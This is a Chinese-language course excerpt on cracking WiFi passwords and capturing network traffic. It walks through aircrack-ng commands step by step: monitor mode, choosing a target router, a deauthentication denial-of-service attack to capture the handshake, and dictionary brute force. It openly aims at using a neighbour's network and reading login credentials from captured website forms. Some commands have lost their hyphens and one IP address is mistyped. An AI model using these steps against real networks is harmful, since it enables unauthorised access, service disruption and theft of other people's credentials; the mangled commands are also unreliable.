WIFI密码破解与网络数据抓包

WIFI密码破解与网络数据抓包

（摘自传智播客C++学院）

课程知识点

1. Wifi密码破解原理剖析

2. 网络数据抓包与分析

3. 路由器攻击，瘫痪网络

4. 随心所欲，开发定制密码字典

5. 枚举字典，暴力破解

6. 轻松使用”隔壁老王“的wifi

一、Wireshark：网络数据抓包与分析

Wireshark是一个非常好用的抓包工具，当我们遇到一些和网络相关的问题时，可以通过这个工具进行分析，不过要说明的是，这只是一个工具，用法是非常灵活的。



wireshark下载地址

https://www.wireshark.org/download.html

1、选取网卡

wireshark左上角，查找list那个钮。

2、设置抓包过滤器(CaptureFilters

语法： Protocol $ Direction $ Host(s) $ Value $ Logical Operations $ Other expression
例子： ip src host 192.168.1.100
tcp dst port 8080

Protocol（协议）

可能的值: ether, fddi, ip, arp, rarp, decnet, lat, sca, moprc, mopdl, tcp and udp.

如果没有特别指明是什么协议，则默认使用所有支持的协议。

Direction（方向）

可能的值: src, dst, src and dst, src or dst

Host(s)

可能的值： net, port, host, portrange.

如果没有指定此值，则默认使用”host”关键字。 例如，”src 10.1.1.1″与”src host 10.1.1.1″相同。

Logical Operations（逻辑运算）

可能的值：not, and, or.

否(“not”)具有最高的优先级。或(“or”)和与(“and”)具有相同的优先级，运算时从左至右进行。 例如:

“not tcp port 3128 and tcp port 23″与”(not tcp port 3128) and tcp port 23″相同。
“not tcp port 3128 and tcp port 23″与”not (tcp port 3128 and tcp port 23)”不同。

3、设置显示过滤器(DisplayFilters)

语法： Protocol.String1.String2 $ Comparison operator $ Value $ Logical Operations $ Other expression
例子： ip.src==192.168.1.100 (显示来源为192.192.168.1.100的包)

tcp.port==80

4、网络封包分析

捕获登陆某网站的表单，分析其账号和密码。

二、Wifi密码破解原理剖析

三、Aircrackng

1、下载

http://www.aircrackng.org/ http://www.aircrackng.org/downloads.html wget http://download.aircrackng.org/aircrackng1.2rc2.tar.gz

2、安装

sudo aptget install buildessential libssldev pkgconfig
libnl3dev libnlgenl3dev
tar zxvf aircrackng1.2rc2.tar.gz
cd aircrackng1.2rc2
make
sudo make install

四、WiFi密码破解

1. 查看本机电脑无线网卡

iwconfig 或者 ifconfig

2. 激活网卡到monitor模式，得到监控模式下的设备名为wlan0mon

sudo airmon-ng start wlan0

3. 探测无线网络，选取破解路由器对象

sudo airodump-ng wlan0mon

4. 设定监控频道，抓取被选定路由器的数据包，始终运行

sudo airodump-ng –ivs -w linuxcpp -c 6 wlan0mon

捕获的包存入linuxcp-0x.ivs 文件。x为序号

5. 新开终端，发起Deauth攻击，迫使客户端重新链接路由器

sudo aireplay-ng -0 1 -a 路由器MAC h 合法链接客户端MAC wlan0mon

De-Authentication DoS 去验证洪水攻击，国际上称之为De-authentication Flood Attack，全称即去身份验证洪水攻击或去验证阻断洪水攻击，通常被简称为Deauth攻击，是无线网络拒绝服务攻击的一种形式，它旨在通过欺骗从AP到客户端单播地址的去身份验证帧来将客户端转为未关联的/未认证的状态。

如果Deauth攻击成功，airodump-ng捕获handshake ，此时可以ctrl+c终止airodump-ng抓包。



6. aircrack-ng穷举字典，暴力破解

sudo aircrack-ng -w dic linuxcpp-01.ivs

破解成功与否取决与字典是否涵盖全面，破解速度取决于硬件计算性能和字典优化





字典开发 （网络上有，或自己生成）